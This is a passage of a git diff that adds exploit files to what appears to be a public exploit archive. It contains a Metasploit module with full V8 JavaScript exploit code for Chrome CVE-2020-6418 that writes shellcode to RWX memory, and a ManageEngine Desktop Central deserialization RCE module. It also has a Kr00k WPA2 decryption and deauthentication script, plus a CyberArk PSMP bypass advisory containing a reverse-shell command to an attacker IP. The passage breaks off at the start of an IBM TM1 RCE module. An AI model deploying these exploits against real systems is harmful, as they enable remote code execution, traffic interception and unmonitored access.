+      The relative read and write is then used to modify a UInt64Array (uint64_aarw)
+      which is used for read and writing from absolute memory.
+      The exploit then uses WebAssembly in order to allocate a region of RWX memory,
+      which is then replaced with the payload shellcode.
+      The payload is executed within the sandboxed renderer process, so the browser
+      must be run with the --no-sandbox option for the payload to work correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Clément Lecigne', # discovery
+          'István Kurucsai', # exploit
+          'Vignesh S Rao',   # exploit
+          'timwr', # metasploit copypasta
+        ],
+      'References'     => [
+          ['CVE', '2020-6418'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],
+          ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],
+          ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],
+        ],
+      'Arch'           => [ ARCH_X64 ],
+      'DefaultTarget'  => 0,
+      'Targets'        =>
+        [
+          ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],
+          ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],
+        ],
+      'DisclosureDate' => 'Feb 19 2020'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
+  end
+
+  def on_request_uri(cli, request)
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] #{request.body}")
+      send_response(cli, '')
+      return
+    end
+
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    escaped_payload = Rex::Text.to_unescape(payload.raw)
+    jscript = %Q^
+var shellcode = unescape("#{escaped_payload}");
+
+// HELPER FUNCTIONS
+let conversion_buffer = new ArrayBuffer(8);
+let float_view = new Float64Array(conversion_buffer);
+let int_view = new BigUint64Array(conversion_buffer);
+BigInt.prototype.hex = function() {
+    return '0x' + this.toString(16);
+};
+BigInt.prototype.i2f = function() {
+    int_view[0] = this;
+    return float_view[0];
+}
+BigInt.prototype.smi2f = function() {
+    int_view[0] = this << 32n;
+    return float_view[0];
+}
+Number.prototype.f2i = function() {
+    float_view[0] = this;
+    return int_view[0];
+}
+Number.prototype.f2smi = function() {
+    float_view[0] = this;
+    return int_view[0] >> 32n;
+}
+
+Number.prototype.fhw = function() {
+    float_view[0] = this;
+    return int_view[0] >> 32n;
+}
+
+Number.prototype.flw = function() {
+    float_view[0] = this;
+    return int_view[0] & BigInt(2**32-1);
+}
+
+Number.prototype.i2f = function() {
+    return BigInt(this).i2f();
+}
+Number.prototype.smi2f = function() {
+    return BigInt(this).smi2f();
+}
+
+function hex(a) {
+    return a.toString(16);
+}
+
+//
+// EXPLOIT
+//
+
+// the number of holes here determines the OOB write offset
+let vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];
+var float_rel;      // float array, initially corruption target
+var float_carw;     // float array, used for reads/writes within the compressed heap
+var uint64_aarw;    // uint64 typed array, used for absolute reads/writes in the entire address space
+var obj_leaker;     // used to implement addrof
+vuln.pop();
+vuln.pop();
+vuln.pop();
+
+function empty() {}
+
+function f(nt) {
+    // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug
+    vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
+    for (var i = 0; i < 0x10000; ++i) {};
+}
+
+let p = new Proxy(Object, {
+    get: function() {
+        vuln[0] = {};
+        float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];
+        float_carw = [6.6];
+        uint64_aarw = new BigUint64Array(4);
+        obj_leaker = {
+            a: float_rel,
+            b: float_rel,
+        };
+
+        return Object.prototype;
+    }
+});
+
+function main(o) {
+  for (var i = 0; i < 0x10000; ++i) {};
+  return f(o);
+}
+
+// reads 4 bytes from the compressed heap at the specified dword offset after float_rel
+function crel_read4(offset) {
+    var qw_offset = Math.floor(offset / 2);
+    if (offset & 1 == 1) {
+        return float_rel[qw_offset].fhw();
+    } else {
+        return float_rel[qw_offset].flw();
+    }
+}
+
+// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel
+function crel_write4(offset, val) {
+    var qw_offset = Math.floor(offset / 2);
+    // we are writing an 8-byte double under the hood
+    // read out the other half and keep its value
+    if (offset & 1 == 1) {
+        temp = float_rel[qw_offset].flw();
+        new_val = (val << 32n | temp).i2f();
+        float_rel[qw_offset] = new_val;
+    } else {
+        temp = float_rel[qw_offset].fhw();
+        new_val = (temp << 32n | val).i2f();
+        float_rel[qw_offset] = new_val;
+    }
+}
+
+const float_carw_elements_offset = 0x14;
+
+function cabs_read4(caddr) {
+    elements_addr = caddr - 8n | 1n;
+    crel_write4(float_carw_elements_offset, elements_addr);
+    print('cabs_read4: ' + hex(float_carw[0].f2i()));
+    res = float_carw[0].flw();
+    // TODO restore elements ptr
+    return res;
+}
+
+
+// This function provides arbitrary within read the compressed heap
+function cabs_read8(caddr) {
+    elements_addr = caddr - 8n | 1n;
+    crel_write4(float_carw_elements_offset, elements_addr);
+    print('cabs_read8: ' + hex(float_carw[0].f2i()));
+    res = float_carw[0].f2i();
+    // TODO restore elements ptr
+    return res;
+}
+
+// This function provides arbitrary write within the compressed heap
+function cabs_write4(caddr, val) {
+    elements_addr = caddr - 8n | 1n;
+
+    temp = cabs_read4(caddr + 4n | 1n);
+    print('cabs_write4 temp: '+ hex(temp));
+
+    new_val = (temp << 32n | val).i2f();
+
+    crel_write4(float_carw_elements_offset, elements_addr);
+    print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));
+
+    float_carw[0] = new_val;
+    // TODO restore elements ptr
+    return res;
+}
+
+const objleaker_offset = 0x41;
+function addrof(o) {
+    obj_leaker.b = o;
+    addr = crel_read4(objleaker_offset) & BigInt(2**32-2);
+    obj_leaker.b = {};
+    return addr;
+}
+
+const uint64_externalptr_offset = 0x1b;     // in 8-bytes
+
+// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array
+function read8(addr) {
+    faddr = addr.i2f();
+    t1 = float_rel[uint64_externalptr_offset];
+    t2 = float_rel[uint64_externalptr_offset + 1];
+    float_rel[uint64_externalptr_offset] = faddr;
+    float_rel[uint64_externalptr_offset + 1] = 0.0;
+
+    val = uint64_aarw[0];
+
+    float_rel[uint64_externalptr_offset] = t1;
+    float_rel[uint64_externalptr_offset + 1] = t2;
+    return val;
+}
+
+// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array
+function write8(addr, val) {
+    faddr = addr.i2f();
+    t1 = float_rel[uint64_externalptr_offset];
+    t2 = float_rel[uint64_externalptr_offset + 1];
+    float_rel[uint64_externalptr_offset] = faddr;
+    float_rel[uint64_externalptr_offset + 1] = 0.0;
+
+    uint64_aarw[0] = val;
+
+    float_rel[uint64_externalptr_offset] = t1;
+    float_rel[uint64_externalptr_offset + 1] = t2;
+    return val;
+}
+
+// Given an array of bigints, this will write all the elements to the address provided as argument
+function writeShellcode(addr, sc) {
+    faddr = addr.i2f();
+    t1 = float_rel[uint64_externalptr_offset];
+    t2 = float_rel[uint64_externalptr_offset + 1];
+    float_rel[uint64_externalptr_offset - 1] = 10;
+    float_rel[uint64_externalptr_offset] = faddr;
+    float_rel[uint64_externalptr_offset + 1] = 0.0;
+
+    for (var i = 0; i < sc.length; ++i) {
+        uint64_aarw[i] = sc[i]
+    }
+
+    float_rel[uint64_externalptr_offset] = t1;
+    float_rel[uint64_externalptr_offset + 1] = t2;
+}
+
+
+function get_compressed_rw() {
+
+    for (var i = 0; i < 0x10000; ++i) {empty();}
+
+    main(empty);
+    main(empty);
+
+    // Function would be jit compiled now.
+    main(p);
+
+    print(`Corrupted length of float_rel array = ${float_rel.length}`);
+}
+
+function get_arw() {
+    get_compressed_rw();
+    print('should be 0x2: ' + hex(crel_read4(0x15)));
+    let previous_elements = crel_read4(0x14);
+    //print(hex(previous_elements));
+    //print(hex(cabs_read4(previous_elements)));
+    //print(hex(cabs_read4(previous_elements + 4n)));
+    cabs_write4(previous_elements, 0x66554433n);
+    //print(hex(cabs_read4(previous_elements)));
+    //print(hex(cabs_read4(previous_elements + 4n)));
+
+    print('addrof(float_rel): ' + hex(addrof(float_rel)));
+    uint64_aarw[0] = 0x4142434445464748n;
+}
+
+function rce() {
+    function get_wasm_func() {
+        var importObject = {
+            imports: { imported_func: arg => print(arg) }
+        };
+        bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
+        wasm_code = new Uint8Array(bc);
+        wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
+        return wasm_mod.exports.exported_func;
+    }
+
+    let wasm_func = get_wasm_func();
+    //  traverse the JSFunction object chain to find the RWX WebAssembly code page
+    let wasm_func_addr = addrof(wasm_func);
+    let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;
+    print('sfi: ' + hex(sfi));
+    let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;
+    print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));
+
+    let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;
+    print('instance: ' + hex(instance));
+
+    let wasm_rwx_addr = cabs_read8(instance + 0x68n);
+    print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));
+
+    // write the shellcode to the RWX page
+    while(shellcode.length % 4 != 0){
+        shellcode += "\u9090";
+    }
+
+    let sc = [];
+
+    // convert the shellcode to BigInt
+    for (let i = 0; i < shellcode.length; i += 4) {
+        sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));
+    }
+
+    writeShellcode(wasm_rwx_addr,sc);
+
+    print('success');
+    wasm_func();
+}
+
+
+function exp() {
+    get_arw();
+    rce();
+}
+
+exp();
+^
+
+    if datastore['DEBUG_EXPLOIT']
+      debugjs = %Q^
+print = function(arg) {
+  var request = new XMLHttpRequest();
+  request.open("POST", "/print", false);
+  request.send("" + arg);
+};
+^
+      jscript = "#{debugjs}#{jscript}"
+    else
+      jscript.gsub!(/\/\/.*$/, '') # strip comments
+      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
+
+    html = %Q^
+<html>
+<head>
+<script>
+#{jscript}
+</script>
+</head>
+<body>
+</body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48224.rb b/exploits/multiple/remote/48224.rb
new file mode 100755
index 000000000..313662edc
--- /dev/null
+++ b/exploits/multiple/remote/48224.rb
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'ManageEngine Desktop Central Java Deserialization',
+      'Description'      => %q{
+        This module exploits a Java deserialization vulnerability in the
+        getChartImage() method from the FileStorage class within ManageEngine
+        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
+
+        "The short-term fix for the arbitrary file upload vulnerability was
+        released in build 10.0.474 on January 20, 2020. In continuation of that,
+        the complete fix for the remote code execution vulnerability is now
+        available in build 10.0.479."
+      },
+      'Author'           => [
+        'mr_me', # Discovery and exploit
+        'wvu'    # Module
+      ],
+      'References'       => [
+        ['CVE', '2020-10189'],
+        ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
+        ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
+        ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
+        ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
+      ],
+      'DisclosureDate'   => '2020-03-05', # 0day release
+      'License'          => MSF_LICENSE,
+      'Platform'         => 'windows',
+      'Arch'             => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'       => true,
+      'Targets'          => [
+        ['Windows Command',
+          'Arch'         => ARCH_CMD,
+          'Type'         => :win_cmd
+        ],
+        ['Windows Dropper',
+          'Arch'         => [ARCH_X86, ARCH_X64],
+          'Type'         => :win_dropper
+        ],
+        ['PowerShell Stager',
+          'Arch'         => [ARCH_X86, ARCH_X64],
+          'Type'         => :psh_stager
+        ]
+      ],
+      'DefaultTarget'    => 2,
+      'DefaultOptions'   => {
+        'RPORT'          => 8383,
+        'SSL'            => true,
+        'WfsDelay'       => 60 # It can take a little while to trigger
+      },
+      'CmdStagerFlavor'  => 'certutil', # This works without issue
+      'Notes'            => {
+        'PatchedVersion' => Gem::Version.new('100474'),
+        'Stability'      => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
+        'Reliability'    => [FIRST_ATTEMPT_FAIL],    # Payload upload may fail
+        'SideEffects'    => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'configurations.do')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target is not responding to check')
+    end
+
+    unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
+      return CheckCode::Unknown('Target is not running Desktop Central')
+    end
+
+    version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text
+
+    unless version
+      return CheckCode::Detected('Could not detect Desktop Central version')
+    end
+
+    vprint_status("Detected Desktop Central version #{version}")
+
+    if Gem::Version.new(version) < notes['PatchedVersion']
+      return CheckCode::Appears("#{version} is an exploitable version")
+    end
+
+    CheckCode::Safe("#{version} is not an exploitable version")
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :win_cmd
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # XXX: An executable is required to run arbitrary commands
+    cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper
+
+    vprint_status("Serializing command: #{cmd}")
+
+    # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
+    serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
+      'CommonsBeanutils1',
+      cmd
+    )
+
+    # XXX: Patch in expected serialVersionUID
+    serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"
+
+    # Rock 'n' roll!
+    upload_serialized_payload(serialized_payload)
+    deserialize_payload
+  end
+
+  def upload_serialized_payload(serialized_payload)
+    print_status('Uploading serialized payload')
+
+    res = send_request_cgi(
+      'method'     => 'POST',
+      'uri'        => normalize_uri(target_uri.path,
+                                    '/mdm/client/v1/mdmLogUploader'),
+      'ctype'      => 'application/octet-stream',
+      'vars_get'   => {
+        'udid'     => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
+        'filename' => 'logger.zip'
+      },
+      'data'       => serialized_payload
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
+    end
+
+    print_good('Successfully uploaded serialized payload')
+
+    # C:\Program Files\DesktopCentral_Server\bin
+    register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
+  end
+
+  def deserialize_payload
+    print_status('Deserializing payload')
+
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'cewolf/'),
+      'vars_get' => {'img' => '\\logger.zip'}
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
+    end
+
+    print_good('Successfully deserialized payload')
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/48233.py b/exploits/multiple/remote/48233.py
new file mode 100755
index 000000000..248ec618a
--- /dev/null
+++ b/exploits/multiple/remote/48233.py
@@ -0,0 +1,228 @@
+# Kr00ker
+#
+# Experimetal KR00K PoC in python3 using scapy
+#
+# Description:
+# This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), 
+# that allows to decrypt some WPA2 CCMP data in vulnerable devices.
+# More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning:
+# * the TK (128 bites all zero) 
+# * the Nonce (sent plaintext in packet header)
+# * the Encrypted Data
+#
+# Where:
+# * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data  
+# * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00"
+# * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes)
+#
+# This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs.
+#
+# References:
+# https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf
+#
+#
+# Copyright (C) 2020   Maurizio Siddu
+#
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>
+
+
+
+
+
+import argparse, threading 
+import datetime, sys, re
+from scapy.all import *
+from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
+from Cryptodome.Cipher import AES
+
+
+
+# Proof of Sympathy ;-)
+LOGO = """\
+ __ _  ____   __    __  __ _  ____  ____ 
+(  / )(  _ \ /  \  /  \(  / )(  __)(  _ \\
+ )  (  )   /(  0 )(  0 ))  (  ) _)  )   /
+(__\_)(__\_) \__/  \__/(__\_)(____)(__\_)
+"""
+
+
+KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00'
+
+
+class Krooker:
+    # Define Krooker class
+    def __init__(self, interface, target_mac, other_mac, reason, num, delay):
+        self.interface = interface
+        self.target_mac = target_mac
+        self.other_mac = other_mac
+        self.reason = reason
+        self.num = num
+        self.delay = delay
+
+
+    def wpa2_decrypt(self, enc_pkt):
+        # Try to decrypt the data contained in the sniffed packet
+        t_key = bytes.fromhex("00000000000000000000000000000000")
+        # This check is redundant
+        if not enc_pkt.haslayer(Dot11CCMP):
+            return None
+        dot11 = enc_pkt[Dot11]
+        dot11ccmp = enc_pkt[Dot11CCMP]
+        
+        # Extract the Packet Number (IV)
+        PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0)
+        # Extract the victim MAC address
+        source_addr = re.sub(':','',dot11.addr2)
+        # Extract the QoS tid
+        if enc_pkt.haslayer(Dot11QoS):
+            tid = "{:01x}".format(enc_pkt[Dot11QoS].TID)
+        else:
+            tid = '0'
+        priority = tid + '0'
+        # Build the nonce
+        ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN)
+
+        # Finally try to decrypt wpa2 data 
+        enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8)
+        decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8])
+        return decrypted_data
+
+
+
+    def disassociate(self):
+        # Forge the dot11 disassociation packet
+        dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)
+        # Loop to send the disassociation packets to the victim device
+        while True:
+            # Repeat every delay value seconds
+            time.sleep(self.delay)
+            print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)
+            sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
+
+
+
+    def check_packet(self, sniffed_pkt):
+        # Filter for WPA2 AES CCMP packets containing data to decrypt
+        if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP):
+            #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype))
+            # Decrypt the packets using the all zero temporary key
+            dec_data = self.wpa2_decrypt(sniffed_pkt)
+            # Check if the target is vulnerable
+            if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN:
+                print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes")
+                hexdump(dec_data)
+                # Save the encrypted and decrypted packets
+                print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder")
+                dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:]
+                wrpcap("enc_pkts.pcap", sniffed_pkt, append=True)
+                wrpcap("dec_pkts.pcap", dec_pkt, append=True)
+                # Uncomment this if you need a one-shoot PoC decryption 
+                #sys.exit(0)
+            #else:
+                #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong")
+                #pass
+
+
+
+    def run_disassociation(self):
+        # Run disassociate function in a background thread
+        try:
+            self.disassociate()
+        except KeyboardInterrupt:
+            print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")
+            return
+
+
+
+
+
+def main():
+    # Passing arguments
+    parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w <wifi-channel> -d <delay>")
+    parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str)
+    parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str)
+    parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str)
+    parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1)
+    parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0)
+    parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap")
+    parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1")
+    parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4")
+    args = parser.parse_args()
+    
+    # Print the kr00ker logo
+    print(LOGO)
+
+    # Start the fun!!
+    try:
+        interface = args.interface
+        ap_mac = args.bssid.lower()
+        client_mac = args.client.lower()
+        reason = args.reason
+        target_channel = args.wifi_channel
+        n_pkts = args.number
+        delay = args.delay
+
+        # Set the selected channel
+        if target_channel in range(1, 14):
+            os.system("iwconfig " + interface + " channel " + str(target_channel))
+        else:
+            print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid")
+            exit(1)
+    
+        # Check if valid device MAC Addresses have been specified
+        if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff":
+            print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid")
+            exit(1)
+    
+        # Check if a valid reason have been specified
+        if reason not in range(1,99):
+            print("Exiting, specified a not valid disassociation Reason ID: "+str(reason))
+            exit(1)
+
+        # Set the MAC address of the target
+        if args.target == "client":
+            target_mac = client_mac
+            other_mac = ap_mac
+            print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target")
+        else:
+            target_mac = ap_mac
+            other_mac = client_mac
+            print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target")
+
+        # Krooker instance initialization
+        krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay)
+
+        # Start a background thread to send disassociation packets
+        k_th = threading.Thread(target=krooker.run_disassociation)
+        k_th.daemon = True    # This does not seem to be useful
+        k_th.start()
+
+        # Start packet interception
+        s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data"
+        sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet)    
+
+    except KeyboardInterrupt:
+        print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")
+        k_th.join()
+        sys.exit(0)
+    
+    except scapy.error.Scapy_Exception:
+        print("["+str(datetime.now().time())+"][!] Exiting, your wireless interface seems not in monitor mode")
+        sys.exit(1)
+        
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/multiple/remote/48239.txt b/exploits/multiple/remote/48239.txt
new file mode 100644
index 000000000..29c56f87a
--- /dev/null
+++ b/exploits/multiple/remote/48239.txt
@@ -0,0 +1,93 @@
+# Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass
+# Google Dork: NA
+# Date: 2020-02-25
+# Exploit Author: LAHBAL Said
+# Vendor Homepage: https://www.cyberark.com/
+# Software Link: https://www.cyberark.com/
+# Version: PSMP <=10.9.1
+# Tested on: PSMP 10.9 & PSMP 10.9.1
+# CVE : N/A
+# Patched : PSMP >= 11.1
+
+[Prerequisites]
+
+Policy allows us to overwrite PSMRemoteMachine
+
+[Description]
+An issue was discovered in CyberArk Privileged Session Manager SSH Proxy
+(PSMP)
+through 10.9.1.
+All recordings mechanisms (Keystoke, SSH Text Recorder and video) can be
+evaded
+because users entries are not properly validated.
+Commands executed in a reverse shell are not monitored.
+The connection process will freeze just after the "session is being
+recorded" banner and the all commands we enter are not monitored.
+
+------------------------------------------
+
+[Additional Information]
+We can got a reverse shell (or execute any command we want) from remote
+target and be completely invisible from CyberArk. In logs, we have only
+both PSMConnect and PSMDisconnect events.
+Here are details of the attack :
+1. I connect through CyberArk PSMP server using this
+connection string : ssh <vaultUserName>%username+address%'remoteMachine
+bash -i >& /dev/tcp/<AttackerIP>/<AttackerPort0>&1'@<psmpServer>
+Example : ssh slahbal%sharedLinuxAccount+test.intra%'linux01 bash -i >&
+/dev/tcp/192.168.0.10/443 0>&1'@psmp
+3. This connection string will :
+- Connect me to linux01 using sharedLinuxAccount account that is stored
+into CyberArk and to which I have access.
+- Create a reverse shell to my workstation 192.168.0.10:443 (nc.exe is
+listening on port 443 for this test).
+4. The connection process will freeze just after "The sessions is being
+recorded" banner
+5. I got a reverse shell on which all commands ar not monitored.
+Note 1 : The command that created the reverse shell is NOT captured by
+CyberArk.
+Note 2 : sshd_config has been set with those parameters :
+PSMP_AdditionalDelimiter %
+PSMP_TargetAddressPortAdditionalDelimiter +
+
+------------------------------------------
+
+[VulnerabilityType Other]
+Bypass all recordings mechanisms (Keystoke, SSH Text Recorder and video)
+
+------------------------------------------
+
+[Vendor of Product]
+CyberArk
+
+------------------------------------------
+
+[Affected Product Code Base]
+PSMP - <=10.9.1
+
+------------------------------------------
+
+[Affected Component]
+/opt/CARKpsmp/bin/psmpserver
+
+------------------------------------------
+
+[Attack Type]
+Local
+
+------------------------------------------
+
+[CVE Impact Other]
+The vulnerability allow you to connect through CyberArk PSMP server
+bypassing all recordings mechanisms
+
+------------------------------------------
+
+[Attack Vectors]
+To exploit the vulnerability, someone must connect through PSMP using a
+crafted connection string.
+
+------------------------------------------
+
+[Has vendor confirmed or acknowledged the vulnerability?]
+true
\ No newline at end of file
diff --git a/exploits/multiple/remote/48273.rb b/exploits/multiple/remote/48273.rb
new file mode 100755
index 000000000..fde86e3ef
--- /dev/null
+++ b/exploits/multiple/remote/48273.rb
@@ -0,0 +1,654 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "IBM TM1 / Planning Analytics Unauthenticated Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows
+        an unauthenticated attacker to perform a configuration overwrite.
+        It starts by querying the Admin server for the available applications, picks one,
+        and then exploits it. You can also provide an application name to bypass this step,
+        and exploit the application directly.
+        The configuration overwrite is used to change an application server authentication
